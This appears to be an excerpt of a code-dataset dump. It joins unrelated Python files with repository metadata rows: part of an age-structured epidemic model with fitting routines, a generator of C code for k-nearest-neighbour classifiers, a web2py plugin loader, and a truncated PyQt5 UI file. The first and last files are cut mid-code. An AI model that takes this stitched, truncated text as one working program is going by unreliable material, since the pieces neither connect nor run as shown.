2.27621532e-005, 3.14933351e-005, 7.89308410e-005,
7.24212842e-005, 2.91748203e-005, 6.61873732e-005,
5.95693238e-005, 7.70713500e-005, 5.30687748e-005,
4.66030117e-005, 1.41633235e-005, 2.49066205e-005,
1.19109038e-005],
[5.78863840e-055, 7.88785149e-042, 2.54830412e-006,
2.60648191e-005, 1.68036205e-005, 2.12446739e-005,
3.57267603e-005, 4.02377033e-005, 3.56401935e-005,
3.09769252e-005, 2.13053382e-005, 4.49709414e-005,
2.61368373e-005, 1.68266203e-005, 1.66514322e-005,
2.60822813e-005],
[2.35721271e-141, 9.06871674e-097, 1.18637122e-089,
9.39934076e-022, 4.66000452e-005, 4.69664011e-005,
4.69316082e-005, 8.42184044e-005, 2.77788168e-005,
1.03294378e-005, 1.06803618e-005, 7.26341826e-075,
1.10073971e-065, 1.02831671e-005, 5.16902994e-049,
8.28040509e-043]])
Mu_other = np.array([[0.95537734, 0.46860132, 0.27110607, 0.19447667, 0.32135073,
0.48782072, 0.54963024, 0.42195593, 0.27152038, 0.17864251,
0.20155642, 0.16358271, 0.1040159 , 0.0874149 , 0.05129938,
0.02153823],
[0.51023519, 2.17757364, 0.9022516 , 0.24304235, 0.20119518,
0.39689588, 0.47242431, 0.46949918, 0.37741651, 0.16843746,
0.12590504, 0.12682331, 0.11282247, 0.08222718, 0.03648526,
0.02404257],
[0.18585796, 1.11958124, 4.47729443, 0.67959759, 0.43936317,
0.36934142, 0.41566744, 0.44467286, 0.48797422, 0.28795385,
0.17659191, 0.10674831, 0.07175567, 0.07249261, 0.04815305,
0.03697862],
[0.09854482, 0.3514869 , 1.84902386, 5.38491613, 1.27425161,
0.59242579, 0.36578735, 0.39181798, 0.38131832, 0.31501028,
0.13275648, 0.06408612, 0.04499218, 0.04000664, 0.02232326,
0.01322698],
[0.13674436, 0.1973461 , 0.33264088, 2.08016394, 3.28810184,
1.29198125, 0.74642201, 0.44357051, 0.32781391, 0.35511243,
0.20132011, 0.12961 , 0.04994553, 0.03748657, 0.03841073,
0.02700581],
[0.23495203, 0.13839031, 0.14085679, 0.5347385 , 1.46021275,
1.85222022, 1.02681162, 0.61513602, 0.39086271, 0.32871844,
0.25938947, 0.13520412, 0.05101963, 0.03714278, 0.02177751,
0.00979745],
[0.23139098, 0.18634831, 0.32002214, 0.2477269 , 0.64111274,
0.93691022, 1.14560725, 0.73176025, 0.43760432, 0.31057135,
0.29406937, 0.20632155, 0.09044896, 0.06448983, 0.03041877,
0.02522842],
[0.18786196, 0.25090485, 0.21366969, 0.15358412, 0.35761286,
0.62390736, 0.76125666, 0.82975354, 0.54980593, 0.32778339,
0.20858991, 0.1607099 , 0.13218526, 0.09042909, 0.04990491,
0.01762718],
[0.12220241, 0.17968132, 0.31826246, 0.19846971, 0.34823183,
0.41563737, 0.55930999, 0.54070187, 0.5573184 , 0.31526474,
0.20194048, 0.09234293, 0.08377534, 0.05819374, 0.0414762 ,
0.01563101],
[0.03429527, 0.06388018, 0.09407867, 0.17418896, 0.23404519,
0.28879108, 0.34528852, 0.34507961, 0.31461973, 0.29954426,
0.21759668, 0.09684718, 0.06596679, 0.04274337, 0.0356891 ,
0.02459849],
[0.05092152, 0.10829561, 0.13898902, 0.2005828 , 0.35807132,
0.45181815, 0.32281821, 0.28014803, 0.30125545, 0.31260137,
0.22923948, 0.17657382, 0.10276889, 0.05555467, 0.03430327,
0.02064256],
[0.06739051, 0.06795035, 0.0826437 , 0.09522087, 0.23309189,
0.39055444, 0.39458465, 0.29290532, 0.27204846, 0.17810118,
0.24399007, 0.22146653, 0.13732849, 0.07585801, 0.03938794,
0.0190908 ],
[0.04337917, 0.05375367, 0.05230119, 0.08066901, 0.16619572,
0.25423056, 0.25580913, 0.27430323, 0.22478799, 0.16909017,
0.14284879, 0.17211604, 0.14336033, 0.10344522, 0.06797049,
0.02546014],
[0.04080687, 0.06113728, 0.04392062, 0.04488748, 0.12808591,
0.19886058, 0.24542711, 0.19678011, 0.17800136, 0.13147441,
0.13564091, 0.14280335, 0.12969805, 0.11181631, 0.05550193,
0.02956066],
[0.01432324, 0.03441212, 0.05604694, 0.10154456, 0.09204 ,
0.13341443, 0.13396901, 0.16682638, 0.18562675, 0.1299677 ,
0.09922375, 0.09634331, 0.15184583, 0.13541738, 0.1169359 ,
0.03805293],
[0.01972631, 0.02274412, 0.03797545, 0.02036785, 0.04357298,
0.05783639, 0.10706321, 0.07688271, 0.06969759, 0.08029393,
0.05466604, 0.05129046, 0.04648653, 0.06132882, 0.05004289,
0.03030569]])
def generate_reduced_matrices(age_sep, Ni):
'''
Receives the age_separation and populations to generate the average contact
matrices, returns a (4, len(age_sep)+1, len(age_sep)+1) with the 4 partial
contact matrices: house, school, work and other
Ni is the population for each population component (16 5-years age groups)
'''
nMat = len(age_sep) + 1
Ms = np.empty((4, nMat, nMat))
age_indexes = list()
age_indexes.append(np.flatnonzero(ages_Mu_min <= age_sep[0]))
for i in range(1, len(age_sep)):
age_indexes.append(np.flatnonzero((ages_Mu_min > age_sep[i-1]) *
(ages_Mu_min <= age_sep[i])))
age_indexes.append(np.flatnonzero(ages_Mu_min > age_sep[-1]))
for i in range(nMat):
Nia = Ni[age_indexes[i]]
Na = Nia.sum()
for j in range(nMat):
Ms[0,i,j] = (Nia * ((Mu_house[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[1,i,j] = (Nia * ((Mu_school[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[2,i,j] = (Nia * ((Mu_work[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[3,i,j] = (Nia * ((Mu_other[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
return Ms
class SEIIHURD_age:
''' SEIIHURD Model'''
def __init__(self,tamanhoPop,numeroProcessadores=None):
self.N = tamanhoPop
self.numeroProcessadores = numeroProcessadores
self.pos = None
#pars dict betas, delta, kappa, p, gammaA, gammaS, h, epsilon, gammaH, gammaU, muU, muH, wU, wH
# seguindo a notação beta_12 é 2 infectando 1, onde 1 é a linha e 2 a coluna.
def _SEIIHURD_age_eq(self, X, t, pars):
S, E, Ia, Is, H, U, R, D, Nw = np.split(X, 9)
StE = S * (pars['beta'] @ ((Ia * pars['delta'] + Is).reshape((-1,1)))).flatten()
dS = - StE
dE = StE - pars['kappa'] * E
dIa = (1. - pars['p']) * pars['kappa'] * E - pars['gammaA'] * Ia
dIs = pars['p'] * pars['kappa'] * E - pars['gammaS'] * Is
dH = pars['h'] * pars['xi'] * pars['gammaS'] * Is + (1 - pars['muU'] +\
pars['wU'] * pars['muU']) * pars['gammaU'] * U - pars['gammaH'] * H
dU = pars['h'] * (1 - pars['xi']) * pars['gammaS'] * Is + pars['wH'] *\
pars['gammaH'] * H - pars['gammaU'] * U
dR = pars['gammaA'] * Ia + (1. - pars['h']) * pars['gammaS'] * Is + \
(1 - pars['muH']) * (1 - pars['wH']) * pars['gammaH'] * H
dD = (1 - pars['wH']) * pars['muH'] * pars['gammaH'] * H + \
(1 - pars['wU']) * pars['muU'] * pars['gammaU'] * U
dNw = pars['p'] * pars['kappa'] * E
return np.r_[dS, dE, dIa, dIs, dH, dU, dR, dD, dNw]
def _call_ODE(self, ts, ppars):
betas = ppars['beta'].copy()
pars = copy.deepcopy(ppars)
if 'tcut' not in ppars.keys():
tcorte = None
else:
tcorte = pars['tcut']
if type(ts) in [int, float]:
ts = np.arange(ts)
if tcorte == None:
tcorte = [ts[-1]]
if type(betas) != list:
betas = [betas]
if tcorte[-1] < ts[-1]:
tcorte.append(ts[-1])
tcorte = [ts[0]] + tcorte
tcorte.sort()
Is0 = pars['x0'].reshape((3,-1)).sum(axis=0)
x0 = np.r_[1. - Is0, pars['x0'], np.zeros(4*len(Is0)), pars['x0'][2*len(Is0):]]
saida = x0.reshape((1,-1))
Y = saida.copy()
for i in range(1, len(tcorte)):
cut_last = False
pars['beta'] = betas[i-1]
t = ts[(ts >= tcorte[i-1]) * (ts<= tcorte[i])]
if len(t) > 0:
if t[0] > tcorte[i-1]:
t = np.r_[tcorte[i-1], t]
if t[-1] < tcorte[i]:
t = np.r_[t, tcorte[i]]
cut_last = True
Y = spi.odeint(self._SEIIHURD_age_eq, Y[-1], t, args=(pars,))
if cut_last:
saida = np.r_[saida, Y[1:-1]]
else:
saida = np.r_[saida, Y[1:]]
else:
Y = spi.odeint(self._SEIIHURD_age_eq, Y[-1], tcorte[i-1:i+1], args=(pars,))
return ts, saida
def _fill_paramPSO(self, paramPSO):
if 'options' not in paramPSO.keys():
paramPSO['options'] = {'c1': 0.1, 'c2': 0.3, 'w': 0.9,'k':5,'p':2}
if 'n_particles' not in paramPSO.keys():
paramPSO['n_particles'] = 300
if 'iter' not in paramPSO.keys():
paramPSO['iter'] = 1000
return paramPSO
def _prepare_input(self, data):
list_states = ['S', 'E', 'Ia', 'Is', 'H', 'U', 'R', 'D', 'Nw']
i_integ = list()
Y = list()
for ke in data.keys():
if ke == 't':
t = data[ke]
else:
Y.append(data[ke])
simb, num = ke.split("_")
n0 = self.nages * list_states.index(simb)
if '_ALL' in ke:
i_integ.append(list(range(n0,n0 + self.nages)))
else:
i_integ.append(int(num) + n0)
return i_integ, Y, t
def _prepare_conversor(self, p2f, pothers, bound):
padjus = list()
if bound != None:
bound_new = [[], []]
for i, par in enumerate(p2f):
if 'beta' in par:
if '_ALL' in par:
for l in range(len(pothers['beta'])):
for j in range(pothers['beta'][i].shape[0]):
for k in range(pothers['beta'][i].shape[1]):
padjus.append('beta_{}_{}_{}'.format(l,j,k))
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
else:
padjus.append(par)
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
elif '_ALL' in par:
name = par.split('_')[0]
for j in range(len(pothers[name])):
padjus.append('{}_{}'.format(name, j))
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
else:
padjus.append(par)
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
if bound != None:
bound_new[0] = np.array(bound_new[0])
bound_new[1] = np.array(bound_new[1])
return bound_new, padjus
def _conversor(self, coefs, pars0, padjus):
pars = copy.deepcopy(pars0)
for i, coef in enumerate(coefs):
if 'beta' in padjus[i]:
if '_M_' in padjus[i]:
indx = int(padjus[i].split('_')[-1])
pars['beta'][indx] = coef * pars['beta'][indx]
else:
indx = padjus[i].split('_')
pars['beta'][int(indx[1])][int(indx[2]), int(indx[3])] = coef
elif '_' in padjus[i]:
name, indx = padjus[i].split('_')
pars[name][int(indx)] = coef
else:
pars[padjus[i]] = coef
return pars
def objectiveFunction(self, coefs_list, stand_error=False, weights=None):
errsq = np.zeros(coefs_list.shape[0])
for i, coefs in enumerate(coefs_list):
errs = self._residuals(coefs, stand_error, weights)
errsq[i] = (errs*errs).mean()
return errsq
def _residuals(self, coefs, stand_error=False, weights=None):
if type(weights) == type(None):
weights = np.ones(len(self.Y))
error_func = (lambda x: np.sqrt(x+1)) if stand_error else (lambda x:np.ones_like(x))
errs = np.empty((0,))
ts, mY = self._call_ODE(self.t, self._conversor(coefs, self.pars_init, self.padjus))
for indY, indODE in enumerate(self.i_integ):
if type(indODE) == list:
temp = (self.N.reshape((1,-1)) * mY[:,indODE]).sum(axis=1)
errs = np.r_[errs, weights[indY] * ((self.Y[indY] - temp) / error_func(temp)) ]
else:
try:
errs = np.r_[errs, weights[indY] * ((self.Y[indY] - self.N[indODE%self.nages] * mY[:,indODE]) / error_func(mY[:,indODE])) ]
except:
print(self.t, self._conversor(coefs, self.pars_init, self.padjus))
raise
errs = errs[~np.isnan(errs)]
return errs
def prepare_to_fit(self, data, pars, pars_to_fit, bound=None, nages=1, stand_error=False):
self.pars_init = copy.deepcopy(pars)
self.nages = nages
self.i_integ, self.Y, self.t = self._prepare_input(data)
self.bound, self.padjus = self._prepare_conversor(pars_to_fit, pars, bound)
self.n_to_fit = len(self.padjus)
def fit(self, data, pars, pars_to_fit, bound=None, nages=2, paramPSO=dict(), stand_error=False):
'''
data: dictionary:
t -> times
X_N -> variable:
X is the simbol of the parameter: S, E, Ia, Is, H, U, R, D, Nw
N is the index of the age-group, starting on 0
pars: dictionary, with the variable names as keys.
pars_to_fit: the name of the parameters to fits, if the parameter is a list,
add _N with the index you want to if or _ALL to fit all
the 'beta' parameter has 3 indexes: beta_I_J_K, with I indicating the
which tcut it belongs and J_K indicating the position in the matrix.
the beta also has a option 'beta_M_I' that fits a multiplicative
constant of the infection matrix, without changing the relative weights
(the _M_ and _ALL_ options are incompatible by now, and _M_ requires
testing)
bound = intervalo de limite para procura de cada parametro, onde None = sem limite
bound => (lista_min_bound, lista_max_bound)
'''
paramPSO = self._fill_paramPSO(paramPSO)
self.prepare_to_fit(data, pars, pars_to_fit, bound=bound, nages=nages, stand_error=stand_error)
optimizer = ps.single.LocalBestPSO(n_particles=paramPSO['n_particles'], dimensions=self.n_to_fit, options=paramPSO['options'],bounds=self.bound)
cost = pos = None
cost, pos = optimizer.optimize(self.objectiveFunction,paramPSO['iter'], stand_error=stand_error, n_processes=self.numeroProcessadores)
self.pos = pos
self.pars_opt = self._conversor(pos, self.pars_init, self.padjus )
self.rmse = cost
self.optimize = optimizer
def fit_lsquares(self, data, pars, pars_to_fit, bound=None, nages=2, stand_error=False, init=None, nrand=10):
self.prepare_to_fit(data, pars, pars_to_fit, bound=bound, nages=nages, stand_error=stand_error)
if init == None:
cost_best = np.inf
res_best = None
#BUG: the parallel code does not work if PSO code had run previously
if type(self.pos) != type(None) or self.numeroProcessadores == None or self.numeroProcessadores <= 1:
for i in range(nrand):
print("{} / {}".format(i, nrand))
par0 = np.random.rand(self.n_to_fit)
par0 = self.bound[0] + par0 * (self.bound[1] - self.bound[0])
res = least_squares(self._residuals, par0, bounds=self.bound)
if res.cost < cost_best:
cost_best = res.cost
res_best = res
else:
par0 = np.random.rand(nrand, self.n_to_fit)
par0 = self.bound[0].reshape((1,-1)) + par0 * (self.bound[1] - self.bound[0]).reshape((1,-1))
f = lambda p0: least_squares(self._residuals, p0, bounds=self.bound)
all_res = joblib.Parallel(n_jobs=self.numeroProcessadores)(joblib.delayed(f)(p0,) for p0 in par0)
costs = np.array([res.cost for res in all_res])
cost_best = all_res[costs.argmin()].cost
res_best = all_res[costs.argmin()]
else:
res_best = least_squares(self._residuals, init, bounds=bound )
self.pos_ls = res_best.x
self.pars_opt_ls = self._conversor(res_best.x, self.pars_init, self.padjus )
self.rmse_ls = (res_best.fun**2).mean()
self.result_ls = res_best
def predict(self, t=None, coefs=None, model_output=False):
if type(t) == type(None):
t = self.t
if type(coefs) == type(None):
coefs = self.pos
elif type(coefs) == str and coefs == 'LS':
coefs = self.pos_ls
ts, mY = self._call_ODE(t, self._conversor(coefs, self.pars_init, self.padjus))
saida = np.zeros((len(ts), 0))
for i in self.i_integ:
if type(i) == list:
ytemp = (mY[:,i] *self.N.reshape((1,-1))).sum(axis=1)
else:
ytemp = mY[:,i] * self.N[i%self.nages]
saida = np.c_[saida, ytemp.reshape((-1,1))]
if model_output:
return ts, saida, mY
else:
return ts, saida
#ts, X = call_ODE(X0, tmax, betas, param, tcorte=tcorte)
#plt.plot(ts, X[:,:2], '.-')
| 48.936267
| 152
| 0.593135
| 12,347
| 0.38271
| 0
| 0
| 0
| 0
| 0
| 0
| 2,729
| 0.084589
|
a1fac0722dfead6d7d06eddcce884f4ba1c9a684
| 2,447
|
py
|
Python
|
src/fogml/generators/knn_code_generator.py
|
bkulawska/FogML
|
fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a
|
[
"Apache-2.0"
] | null | null | null |
src/fogml/generators/knn_code_generator.py
|
bkulawska/FogML
|
fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a
|
[
"Apache-2.0"
] | null | null | null |
src/fogml/generators/knn_code_generator.py
|
bkulawska/FogML
|
fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import os
from sklearn.neighbors import KNeighborsClassifier
from .base_generator import BaseGenerator
class KNNCodeGenerator(BaseGenerator):
skeleton_path = "skeletons/knn_skeleton.txt"
def __init__(self, clf: KNeighborsClassifier):
self.clf = clf
@staticmethod
def generate_c_matrix(matrix):
result = "{\n"
for i in range(matrix.shape[0]):
result += "{"
for j in range(matrix.shape[1]):
result += "%.6f, " % matrix[i][j]
result += "},\n"
result += "}"
return result
@staticmethod
def generate_c_array(array):
result = "{"
for i in range(len(array)):
result += "%.6f, " % array[i]
result += "}"
return result
def generate_zero_array(self, size):
zero_array = np.zeros(size)
return self.generate_c_array(zero_array)
def metric_calculation(self, metric):
if metric == "euclidean":
return "res += pow2(x[j] - attributes[i][j])"
elif metric == "manhattan":
return "res += abs2(x[j] - attributes[i][j])"
elif metric == "chebyshev":
return "res = max2(res, abs2(x[j] - attributes[i][j]))"
pass
def generate(self, fname="knn_model.c", cname="classifier", **kwargs):
classes = len(self.clf.classes_)
features = self.clf.n_features_in_
k = self.clf.n_neighbors
fit_X = np.array(self.clf._fit_X)
Y = np.array(self.clf._y)
with open(os.path.join(os.path.dirname(__file__), self.skeleton_path)) as skeleton:
code = skeleton.read()
code = self.license_header() + code
code = code.replace('<class_count>', str(classes))
code = code.replace('<features>', str(features))
code = code.replace('<k_neighbours>', str(k))
code = code.replace('<members>', str(len(self.clf._fit_X)))
code = code.replace('<dataset_features>', self.generate_c_matrix(fit_X))
code = code.replace('<member_class>', self.generate_c_array(Y))
code = code.replace('<class_count_empty>', self.generate_zero_array(classes))
code = code.replace('<cname>', cname)
code = code.replace('<metric>', self.metric_calculation(self.clf.metric))
with open(fname, 'w') as output_file:
output_file.write(code)
| 34.957143
| 91
| 0.585206
| 2,320
| 0.9481
| 0
| 0
| 495
| 0.202289
| 0
| 0
| 382
| 0.15611
|
a1fbd1b0e28715e9bf42d61fcecc21a928f44f08
| 8,719
|
py
|
Python
|
modules/plugins/__init__.py
|
sungkomp/sambro
|
4618d785d03424d122206d88d9ebfb6971486e2c
|
[
"MIT"
] | 5
|
2017-02-03T16:29:43.000Z
|
2018-12-17T15:43:36.000Z
|
modules/plugins/__init__.py
|
sungkomp/sambro
|
4618d785d03424d122206d88d9ebfb6971486e2c
|
[
"MIT"
] | 84
|
2016-04-11T12:47:42.000Z
|
2019-05-27T03:46:09.000Z
|
modules/plugins/__init__.py
|
sungkomp/sambro
|
4618d785d03424d122206d88d9ebfb6971486e2c
|
[
"MIT"
] | 3
|
2016-11-29T15:27:18.000Z
|
2019-10-15T02:46:45.000Z
|
# -*- coding: utf-8 -*-
import os
import sys
from gluon import current
from gluon.storage import Storage
__all__ = ("PluginLoader",
)
# Name of the plugin directory in modules
PLUGINS = "plugins"
# Module names to ignore when scanning for plugins
IGNORE = ("skeleton", "__init__")
# Name of the setup function in plugins
SETUP = "setup"
# Name of the variable that contains the version info in plugins
VERSION = "__version__"
# =============================================================================
class PluginLoader(object):
"""
Simple plugin loader (experimental)
Plugins are python modules or packages in the modules/plugins
directory.
Each plugin defines a setup() function which is called during
the request cycle immediately before entering the controller.
Plugins can be added by simply placing them in the plugins
directory, without any code change required.
The plugin directory will be scanned for new or updated plugins
whenever a new session starts, or by calling explicitly:
PluginLoader.detect(reset_all=True)
NB the reloading of the plugins can only be enforced in the
current interpreter thread - while other threads may still
run the old version. Therefore, it is recommended to restart
all threads (=reloading the server) after installing or updating
a plugin.
NB failing setup() methods will not be tried again until the next
reload (new session, restart, or explicit call)
session.s3.plugins contains a dict of all current plugins, like:
{name: (version, status)}
where:
- name is the python module name of the plugin
- version is the version string provided by the plugin (or
"unknown" if not present)
- status is:
None = newly detected plugin, not set up yet
True = plugin has been set up successfully
False = plugin setup failed in the last attempt, deactivated
"""
# -------------------------------------------------------------------------
@classmethod
def setup_all(cls, reload_all=False):
"""
Setup all plugins
@param reload_all: reload all plugins and reset the registry
"""
if reload_all:
cls.detect(reset_all=True)
for name in cls._registry().keys():
cls.load(name)
# -------------------------------------------------------------------------
@classmethod
def detect(cls, reset_all=False):
"""
Detect new plugins and update the registry
@param reset_all: reset all entries in the registry
"""
default = (None, None)
if reset_all:
plugin = lambda name: default
else:
registry = cls._registry()
plugin = lambda name: registry.get(name, default)
plugins = dict((name, plugin(name)) for name in cls._scan())
cls._registry(plugins)
# -------------------------------------------------------------------------
@classmethod
def load(cls, name, force=False):
"""
Run the setup method of a particular plugin
@param name: the name of the plugin
@param force: enforce the plugin to be reloaded and its
setup method to be re-run regardless of the
previous status
"""
log = current.log
registry = cls._registry()
if name not in registry:
cls.detect()
if name not in registry:
raise NameError("plugin '%s' not found" % name)
# Get version and status info from registry
plugin_info = registry[name]
if force or not isinstance(plugin_info, tuple):
version, status = None, None
else:
version, status = plugin_info
if status is None:
new = True
if not (cls._reload(name)):
version, status = "unknown", False
else:
version, status = None, True
else:
new = False
if status is False:
# Skip plugins which have failed in previous attempts
registry[name] = (version, status)
return False
status = True
setup = None
# Import manifest
package = "%s.%s" % (PLUGINS, name)
try:
setup = getattr(__import__(package, fromlist=[SETUP]), SETUP)
except (ImportError, AttributeError):
# This may not be a plugin at all => remove from registry
if new:
log.debug("Plugin '%s' not found" % name)
registry.pop(name, None)
return False
except SyntaxError:
if new:
log.error("Skipping invalid plugin '%s'" % name)
if current.response.s3.debug:
raise
version, status = "invalid", False
if version is None:
# Update version info if plugin has been reloaded
try:
version = getattr(__import__(package, fromlist=[VERSION]), VERSION)
except (ImportError, AttributeError):
version = "unknown"
if status and not callable(setup):
# Is a module => find setup function
try:
setup = setup.setup
except AttributeError:
# No setup function found => treat as failed
if new:
log.debug("No setup function found for plugin '%s'" % name)
status = False
if status:
# Execute setup method
if new:
log.info("Setting up plugin '%s'" % name)
try:
setup()
except Exception:
log.error("Plugin '%s' setup failed" % name)
if current.response.s3.debug:
raise
status = False
# Update the registry
registry[name] = (version, status)
return status
# -------------------------------------------------------------------------
@classmethod
def _registry(cls, plugins=None):
"""
Get (or replace) the current plugin registry
@param plugins: the new registry
"""
session_s3 = current.session.s3
if plugins:
registry = session_s3.plugins = plugins
else:
registry = session_s3.plugins
if registry is None:
# New session => run detect
# - initialize registry first to prevent infinite recursion
registry = session_s3.plugins = {}
cls.detect()
return registry
# -------------------------------------------------------------------------
@staticmethod
def _scan():
"""
Iterator scanning the plugin directory for available plugins
@return: the names of the plugins
"""
folder = current.request.folder
path = os.path.join(folder, "modules", PLUGINS)
names = os.listdir(path)
for name in names:
name_, extension = os.path.splitext(name)
if name_ in IGNORE:
continue
path_ = os.path.join(path, name)
if os.path.isdir(path_) or extension == ".py":
yield(name_)
# -------------------------------------------------------------------------
@staticmethod
def _reload(name):
"""
Reload a plugin
@param name: the plugin name
@note: this works only within the current thread, other
threads may still be bound to the old version of
the plugin
"""
if name in IGNORE:
return
success = True
appname = current.request.application
plugin_name = "applications.%s.modules.%s.%s" % (appname, PLUGINS, name)
plugin = sys.modules.get(plugin_name)
if plugin is not None:
try:
reload(plugin)
except ImportError:
current.log.error("Reloading plugin '%s' failed" % name)
success = False
return success
# =============================================================================
# Do a full scan when reloading the module (=when the thread starts)
PluginLoader.detect(reset_all=True)
# =============================================================================
| 31.02847
| 83
| 0.513476
| 7,926
| 0.909049
| 560
| 0.064228
| 5,817
| 0.667164
| 0
| 0
| 4,359
| 0.499943
|
a1fbde784a20640d80d64437aa8dd036428fff1c
| 15,105
|
py
|
Python
|
CCMtask/ccm.py
|
yyFFans/DemoPractises
|
e0e08413efc598489401c8370f4c7762b3493851
|
[
"MIT"
] | null | null | null |
CCMtask/ccm.py
|
yyFFans/DemoPractises
|
e0e08413efc598489401c8370f4c7762b3493851
|
[
"MIT"
] | null | null | null |
CCMtask/ccm.py
|
yyFFans/DemoPractises
|
e0e08413efc598489401c8370f4c7762b3493851
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ccm.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_CCMTask(object):
def setupUi(self, CCMTask):
CCMTask.setObjectName("CCMTask")
CCMTask.resize(712, 585)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(CCMTask.sizePolicy().hasHeightForWidth())
CCMTask.setSizePolicy(sizePolicy)
CCMTask.setAutoFillBackground(False)
self.centralwidget = QtWidgets.QWidget(CCMTask)
self.centralwidget.setObjectName("centralwidget")
self.issueBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueBox.setGeometry(QtCore.QRect(10, 110, 691, 55))
self.issueBox.setObjectName("issueBox")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.issueBox)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.ARDTSEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ARDTSEdit.sizePolicy().hasHeightForWidth())
self.ARDTSEdit.setSizePolicy(sizePolicy)
self.ARDTSEdit.setTabletTracking(True)
self.ARDTSEdit.setObjectName("ARDTSEdit")
self.horizontalLayout_3.addWidget(self.ARDTSEdit)
spacerItem = QtWidgets.QSpacerItem(70, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem)
self.issueInfoEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.issueInfoEdit.sizePolicy().hasHeightForWidth())
self.issueInfoEdit.setSizePolicy(sizePolicy)
self.issueInfoEdit.setTabletTracking(True)
self.issueInfoEdit.setObjectName("issueInfoEdit")
self.horizontalLayout_3.addWidget(self.issueInfoEdit)
self.label = QtWidgets.QLabel(self.issueBox)
self.label.setText("")
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.issueDetailBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueDetailBox.setGeometry(QtCore.QRect(10, 170, 691, 401))
self.issueDetailBox.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.issueDetailBox.setTabletTracking(True)
self.issueDetailBox.setObjectName("issueDetailBox")
self.deletedParamsBox = QtWidgets.QGroupBox(self.issueDetailBox)
self.deletedParamsBox.setGeometry(QtCore.QRect(500, 20, 161, 271))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsBox.sizePolicy().hasHeightForWidth())
self.deletedParamsBox.setSizePolicy(sizePolicy)
self.deletedParamsBox.setObjectName("deletedParamsBox")
self.deletedParamsEdit = QtWidgets.QTextEdit(self.deletedParamsBox)
self.deletedParamsEdit.setGeometry(QtCore.QRect(10, 20, 141, 231))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsEdit.sizePolicy().hasHeightForWidth())
self.deletedParamsEdit.setSizePolicy(sizePolicy)
self.deletedParamsEdit.setObjectName("deletedParamsEdit")
self.opkeysBox_2 = QtWidgets.QGroupBox(self.issueDetailBox)
self.opkeysBox_2.setGeometry(QtCore.QRect(10, 210, 153, 182))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox_2.sizePolicy().hasHeightForWidth())
self.opkeysBox_2.setSizePolicy(sizePolicy)
self.opkeysBox_2.setObjectName("opkeysBox_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.opkeysBox_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.opkey1Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey1Edit_2.setTabletTracking(True)
self.opkey1Edit_2.setText("")
self.opkey1Edit_2.setPlaceholderText("")
self.opkey1Edit_2.setObjectName("opkey1Edit_2")
self.verticalLayout_2.addWidget(self.opkey1Edit_2)
self.opkey2Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey2Edit_2.setTabletTracking(True)
self.opkey2Edit_2.setText("")
self.opkey2Edit_2.setPlaceholderText("")
self.opkey2Edit_2.setObjectName("opkey2Edit_2")
self.verticalLayout_2.addWidget(self.opkey2Edit_2)
self.opkey3Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey3Edit_2.setTabletTracking(True)
self.opkey3Edit_2.setText("")
self.opkey3Edit_2.setPlaceholderText("")
self.opkey3Edit_2.setObjectName("opkey3Edit_2")
self.verticalLayout_2.addWidget(self.opkey3Edit_2)
self.opkey4Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey4Edit_2.setTabletTracking(True)
self.opkey4Edit_2.setText("")
self.opkey4Edit_2.setPlaceholderText("")
